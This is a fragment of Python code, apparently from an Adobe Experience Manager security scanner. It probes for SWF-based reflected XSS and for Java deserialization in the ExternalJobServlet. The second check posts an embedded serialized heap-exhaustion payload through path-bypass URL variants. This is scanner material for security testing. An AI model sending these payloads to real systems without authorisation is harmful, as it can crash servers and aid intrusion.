            resp = http_request(url, proxy=proxy, debug=debug)

            ct = content_type(resp.headers.get('Content-Type', ''))
            cd = resp.headers.get('Content-Disposition', '')
            if resp.status_code == 200 and ct == 'application/x-shockwave-flash' and not cd:
                f = Finding('Reflected XSS via SWF', url,
                            'AEM exposes SWF that might be vulnerable to reflected XSS. '
                            'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=61')

                results.append(f)
        except Exception:
            if debug:
                error('Exception while performing a check', check='swf_xss', url=url)

    return results 
Example 30
def deser_externaljob_servlet(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    DESERPAYLOAD = base64.b64decode('rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=')  # Generated with oisdos - java -Xmx25g -jar target/oisdos-1.0.jar ObjectArrayHeap

    EXTERNALJOBSERVLET = itertools.product(('/libs/dam/cloud/proxy', '///libs///dam///cloud///proxy'),
                                           ('.json', '.css', '.js', '.html', '.ico', '.png', '.gif', '.1.json',
                                            '...4.2.1...json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
    EXTERNALJOBSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in EXTERNALJOBSERVLET)

    results = []
    for path in EXTERNALJOBSERVLET:
        url = normalize_url(base_url, path)
        data = {':operation': ('', 'job'), 'file': ('jobevent', DESERPAYLOAD, 'application/octet-stream')}
        headers = {'Referer': base_url}
        try:
            resp = http_request_multipart(url, data=data, additional_headers=headers, proxy=proxy, debug=debug)

            if resp.status_code == 500 and 'Java heap space' in str(resp.content):
                f = Finding('ExternalJobServlet', url,
                            'ExternalJobServlet is vulnerable to Java untrusted data deserialization. '
                            'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=102')

                results.append(f)
                break
        except Exception:
            if debug:
                error('Exception while performing a check', check='deser_externaljob_servlet', url=url)

    return results